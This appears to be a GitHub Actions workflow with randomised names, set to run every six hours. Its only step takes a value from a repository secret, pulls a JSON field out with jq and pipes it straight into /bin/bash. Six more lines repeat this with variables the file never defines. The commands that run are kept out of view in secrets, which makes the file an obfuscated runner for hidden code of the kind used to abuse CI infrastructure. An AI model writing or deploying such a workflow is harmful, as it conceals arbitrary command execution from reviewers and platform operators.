name: humoxi8192
on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: humoxi8192
        env:
          rbl741: ${{ secrets.rbl741 }}
        run: |
          echo $rbl741 | jq -r .mqpy95505 | /bin/bash
          echo $kvw401 | jq -r .w654 | /bin/bash
          echo $mmbg6 | jq -r .e7810 | /bin/bash
          echo $t31 | jq -r .xsebw37774 | /bin/bash
          echo $alvdi3 | jq -r .zvx35988 | /bin/bash
          echo $firts50 | jq -r .tw041 | /bin/bash
          echo $ccwud7 | jq -r .vi4498 | /bin/bash

